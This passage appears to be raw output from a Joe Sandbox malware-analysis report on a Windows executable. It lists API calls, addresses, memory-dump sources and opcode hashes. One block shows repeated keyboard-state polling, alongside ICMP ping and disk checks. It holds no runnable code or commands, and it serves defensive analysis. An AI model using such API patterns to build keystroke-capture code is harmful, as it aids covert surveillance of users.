                                • GetWindowRect.USER32(00000000,?), ref: 00C9FC1B
                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C9FC5E
                                • GetDlgItem.USER32(?,000003EA), ref: 00C9FC6C
                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C9FC89
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C9FC96
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ItemMoveRect$Invalidate
                                • String ID:
                                • API String ID: 3096461208-0
                                APIs
                                  • Part of subcall function 00C649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C64954,00000000), ref: 00C64A23
                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C7B85B), ref: 00C7B926
                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00C7B9BD
                                • DestroyAcceleratorTable.USER32(00000000), ref: 00CDE775
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00CDE7A6
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00CDE7BD
                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C7B85B,00000000,?,?,00C7AF1E,?,?), ref: 00CDE7D9
                                • DeleteObject.GDI32(00000000), ref: 00CDE7EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                • String ID:
                                • API String ID: 641708696-0
                                • Opcode ID: f8e3a4f5c074caa083294d7cdd8377b774671cd849ced4235ea9775d956edbc4
                                • Instruction ID: 3887aea353dfb6b8b0edf9c317c873b8175b0ad7be18f321e2d928b61425ac61
                                • Opcode Fuzzy Hash: f8e3a4f5c074caa083294d7cdd8377b774671cd849ced4235ea9775d956edbc4
                                • Instruction Fuzzy Hash: 1461AE39500701EFDB35AF15D8C8B29B7F5FF65311F14851AE2AA8A7A0C770AD82EB50
                                APIs
                                  • Part of subcall function 00C7B155: GetWindowLongW.USER32(?,000000EB), ref: 00C7B166
                                • GetSysColor.USER32(0000000F), ref: 00C7B067
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ColorLongWindow
                                • String ID:
                                • API String ID: 259745315-0
                                • Opcode ID: 9a62e7ca7950666e0239e23d414c99f735358afa6d095ebe37f682b8235cf906
                                • Instruction ID: 4c662e7db850cd3536a9dfae8935413576613a9e9182b355115f751b5a9b8951
                                • Opcode Fuzzy Hash: 9a62e7ca7950666e0239e23d414c99f735358afa6d095ebe37f682b8235cf906
                                • Instruction Fuzzy Hash: 4041A071100544AFDB206F28DC88BBE3B66AB46731F188265FE7A8E2E1D7318D41DB21
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                • String ID:
                                • API String ID: 136442275-0
                                • Opcode ID: 4c1515e611a5ec80c56a8bbc69ae49833f703a11d92f95cef54ea8698e3005a7
                                • Instruction ID: 676dc7a4b228e2163623655a0aae13711ff7ed4001789eb40e617df759ec4ffe
                                • Opcode Fuzzy Hash: 4c1515e611a5ec80c56a8bbc69ae49833f703a11d92f95cef54ea8698e3005a7
                                • Instruction Fuzzy Hash: 31412FB280412CAACF21EB50CC45EDE73BCBB09314F0441E6F919A2051EB34ABD4DFA4
                                APIs
                                • __swprintf.LIBCMT ref: 00C684E5
                                • __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C82177: _xtow@16.LIBCMT ref: 00C82198
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __itow__swprintf_xtow@16
                                • String ID: %.15g$0x%p$False$True
                                • API String ID: 1502193981-2263619337
                                • Opcode ID: d890ab7a5ea67ed8e85cf70f500f63117b7691d6ea8292e660b8476f3a3b2e51
                                • Instruction ID: a953dcb81d4cbd961a6b53fce328c6e80a11fc10d4dd385a4d94a93e4ff23a8c
                                • Opcode Fuzzy Hash: d890ab7a5ea67ed8e85cf70f500f63117b7691d6ea8292e660b8476f3a3b2e51
                                • Instruction Fuzzy Hash: 8D412871500605AFDB34EF38D881E7A73E9BF48310F30445EE55AD7291EE319A45EB20
                                APIs
                                • _memset.LIBCMT ref: 00C85CCA
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • __gmtime64_s.LIBCMT ref: 00C85D63
                                • __gmtime64_s.LIBCMT ref: 00C85D99
                                • __gmtime64_s.LIBCMT ref: 00C85DB6
                                • __allrem.LIBCMT ref: 00C85E0C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E28
                                • __allrem.LIBCMT ref: 00C85E3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E5D
                                • __allrem.LIBCMT ref: 00C85E74
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C85E92
                                • __invoke_watson.LIBCMT ref: 00C85F03
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                • Instruction ID: 3b47e44fa226ea5dbcca9a876c29668332650fd10b29302f7b908aad477b4c49
                                • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                • Instruction Fuzzy Hash: 3D71E871E01B16BBDB14BF78CC85B6A73A8AF14728F14413AF810E7681E7B4DB409B95
                                APIs
                                • _memset.LIBCMT ref: 00CA5816
                                • GetMenuItemInfoW.USER32(00D218F0,000000FF,00000000,00000030), ref: 00CA5877
                                • SetMenuItemInfoW.USER32(00D218F0,00000004,00000000,00000030), ref: 00CA58AD
                                • Sleep.KERNEL32(000001F4), ref: 00CA58BF
                                • GetMenuItemCount.USER32(?), ref: 00CA5903
                                • GetMenuItemID.USER32(?,00000000), ref: 00CA591F
                                • GetMenuItemID.USER32(?,-00000001), ref: 00CA5949
                                • GetMenuItemID.USER32(?,?), ref: 00CA598E
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA59D4
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA59E8
                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA5A09
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                • String ID:
                                • API String ID: 4176008265-0
                                • Opcode ID: f1be9e4caecf5717e9084fa1c66a17ba735f75fe3f2abb2780b79c409dad0871
                                • Instruction ID: 2cb86e81ee49d01600b16aba339cef2b5452ecff7805e889ba4534a27255e7e1
                                • Opcode Fuzzy Hash: f1be9e4caecf5717e9084fa1c66a17ba735f75fe3f2abb2780b79c409dad0871
                                • Instruction Fuzzy Hash: E061A57190068AEFDB11CF64D988ABF7BB8FB0631CF148159E452AB291D7319E46DB20
                                APIs
                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CC9AA5
                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CC9AA8
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC9ACC
                                • _memset.LIBCMT ref: 00CC9ADD
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC9AEF
                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CC9B67
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow_memset
                                • String ID:
                                • API String ID: 830647256-0
                                • Opcode ID: 139e480a6d1db77fa2b5d2ac03874f9229457ddb364ca6590a079c6ea3f246d7
                                • Instruction ID: 76573d933f4f2e842f2b00b51927efa052af1568d1bebec8df06204a886970f1
                                • Opcode Fuzzy Hash: 139e480a6d1db77fa2b5d2ac03874f9229457ddb364ca6590a079c6ea3f246d7
                                • Instruction Fuzzy Hash: 0D616975A00208AFDB20DFA4CC85FEEB7B8EB19704F104159FA15E7291D770AE46DB60
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00CA3591
                                • GetAsyncKeyState.USER32(000000A0), ref: 00CA3612
                                • GetKeyState.USER32(000000A0), ref: 00CA362D
                                • GetAsyncKeyState.USER32(000000A1), ref: 00CA3647
                                • GetKeyState.USER32(000000A1), ref: 00CA365C
                                • GetAsyncKeyState.USER32(00000011), ref: 00CA3674
                                • GetKeyState.USER32(00000011), ref: 00CA3686
                                • GetAsyncKeyState.USER32(00000012), ref: 00CA369E
                                • GetKeyState.USER32(00000012), ref: 00CA36B0
                                • GetAsyncKeyState.USER32(0000005B), ref: 00CA36C8
                                • GetKeyState.USER32(0000005B), ref: 00CA36DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: 5b722d01231681257a39bf2ce8c90884ab8171a18fb670f892d92c6e76c3684d
                                • Instruction ID: 793004a1b759b9f68ea8c5bcf96de2e042f39875507f353a11c2e23eafbca858
                                • Opcode Fuzzy Hash: 5b722d01231681257a39bf2ce8c90884ab8171a18fb670f892d92c6e76c3684d
                                • Instruction Fuzzy Hash: FA4198649047CB7DFF319B6489243B5BEA07B1334CF044059F5D64A2C1EBA49BC8CB62
                                APIs
                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00C9A2AA
                                • SafeArrayAllocData.OLEAUT32(?), ref: 00C9A2F5
                                • VariantInit.OLEAUT32(?), ref: 00C9A307
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C9A327
                                • VariantCopy.OLEAUT32(?,?), ref: 00C9A36A
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C9A37E
                                • VariantClear.OLEAUT32(?), ref: 00C9A393
                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00C9A3A0
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C9A3A9
                                • VariantClear.OLEAUT32(?), ref: 00C9A3BB
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C9A3C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                • String ID:
                                • API String ID: 2706829360-0
                                • Opcode ID: 507f76d843f0f461448fdb4a99197cf9287d163af91a0f97f91aa65a6bb0e78a
                                • Instruction ID: a115320e0d4f67034cb79b74549c03bd1b81f27960397cbf70b190a9b4f54caa
                                • Opcode Fuzzy Hash: 507f76d843f0f461448fdb4a99197cf9287d163af91a0f97f91aa65a6bb0e78a
                                • Instruction Fuzzy Hash: 81411D31900219AFCF01DFA4DC88ADEBBB9FF48344F008065F556A72A1DB35EA45DBA1
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • CoInitialize.OLE32 ref: 00CBB298
                                • CoUninitialize.OLE32 ref: 00CBB2A3
                                • CoCreateInstance.OLE32(?,00000000,00000017,00CED8FC,?), ref: 00CBB303
                                • IIDFromString.OLE32(?,?), ref: 00CBB376
                                • VariantInit.OLEAUT32(?), ref: 00CBB410
                                • VariantClear.OLEAUT32(?), ref: 00CBB471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                • API String ID: 834269672-1287834457
                                • Opcode ID: a3cd99c24e9004e4a4cb1da102c8502b8a610d35c32643e79586608b640ce367
                                • Instruction ID: d5216e06d112583e2a6b81a2999f9a921770c7d38612fcc3f0b8985bfeba1f3f
                                • Opcode Fuzzy Hash: a3cd99c24e9004e4a4cb1da102c8502b8a610d35c32643e79586608b640ce367
                                • Instruction Fuzzy Hash: 5461B170204711AFC710DF55C889BAEB7E8AF49714F04451DF9969B2A1CBB0EE48CB92
                                APIs
                                • WSAStartup.WSOCK32(00000101,?), ref: 00CB86F5
                                • inet_addr.WSOCK32(?,?,?), ref: 00CB873A
                                • gethostbyname.WSOCK32(?), ref: 00CB8746
                                • IcmpCreateFile.IPHLPAPI ref: 00CB8754
                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB87C4
                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB87DA
                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CB884F
                                • WSACleanup.WSOCK32 ref: 00CB8855
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                • String ID: Ping
                                • API String ID: 1028309954-2246546115
                                • Opcode ID: fcf8f6228994f831cde103ec72b491c052fb3735ad9f894420a60e17927cf89a
                                • Instruction ID: 5d852c937ee6bb0cb7c022cd1dd4ae91d8cce30890a6579b30a2a5fa5bc4d5a3
                                • Opcode Fuzzy Hash: fcf8f6228994f831cde103ec72b491c052fb3735ad9f894420a60e17927cf89a
                                • Instruction Fuzzy Hash: 195181316042019FD720EF25CC85B6E7BE8EB48724F148529F566EB2E1DF31E905DB51
                                APIs
                                • _memset.LIBCMT ref: 00CC9C68
                                • CreateMenu.USER32 ref: 00CC9C83
                                • SetMenu.USER32(?,00000000), ref: 00CC9C92
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC9D1F
                                • IsMenu.USER32(?), ref: 00CC9D35
                                • CreatePopupMenu.USER32 ref: 00CC9D3F
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC9D70
                                • DrawMenuBar.USER32 ref: 00CC9D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                • String ID: 0
                                • API String ID: 176399719-4108050209
                                • Opcode ID: 66fac5a15860f9f9098baedd59236be0c9c54df4681f1a47271770d4e2645439
                                • Instruction ID: cf14826744fd1b95ee71d6d9ef909e9d0c62fe2b774446261c6fc74671a164a4
                                • Opcode Fuzzy Hash: 66fac5a15860f9f9098baedd59236be0c9c54df4681f1a47271770d4e2645439
                                • Instruction Fuzzy Hash: 6D414A79A01209EFDB20EF64D888FDABBB5FF49314F144418E956AB351D730AA10DFA0
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAEC1E
                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CAEC94
                                • GetLastError.KERNEL32 ref: 00CAEC9E
                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00CAED0B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Error$Mode$DiskFreeLastSpace
                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                • API String ID: 4194297153-14809454
                                • Opcode ID: 80234885949d013449e45f8371cf2bbdecd618e9181b0af4b32365f5e4edc20c
                                • Instruction ID: 9272910b6632913c867bfda34f8988b5061caa84287c9a9c577119c15c4af43e
                                • Opcode Fuzzy Hash: 80234885949d013449e45f8371cf2bbdecd618e9181b0af4b32365f5e4edc20c
                                • Instruction Fuzzy Hash: F431C135A0020AAFC710EF68D985ABEB7B5FF46728F104026F512EB291DA719E41DBD1
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C9C782
                                • GetDlgCtrlID.USER32 ref: 00C9C78D
                                • GetParent.USER32 ref: 00C9C7A9
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9C7AC
                                • GetDlgCtrlID.USER32(?), ref: 00C9C7B5
                                • GetParent.USER32(?), ref: 00C9C7D1
                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C9C7D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 313823418-1403004172
                                • Opcode ID: ed6f797369c3fb6754066c9ca576062e9d88227fee4687c8d598c270420f2658
                                • Instruction ID: af119f137d363e6c561af38faa09408ec6ad7fdf1b61dad17193cbd058057de4
                                • Opcode Fuzzy Hash: ed6f797369c3fb6754066c9ca576062e9d88227fee4687c8d598c270420f2658
                                • Instruction Fuzzy Hash: BF219D74A00208BFDF05EBA4CCC9EBEBBA9EF49310F104115F562972E1DB75595AEB20
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C9C869
                                • GetDlgCtrlID.USER32 ref: 00C9C874
                                • GetParent.USER32 ref: 00C9C890
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9C893
                                • GetDlgCtrlID.USER32(?), ref: 00C9C89C
                                • GetParent.USER32(?), ref: 00C9C8B8
                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C9C8BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 313823418-1403004172
                                • Opcode ID: 467a645887d104cc25b9efd051b086f813e81eb46b0a89aff6e7140bf77ec211
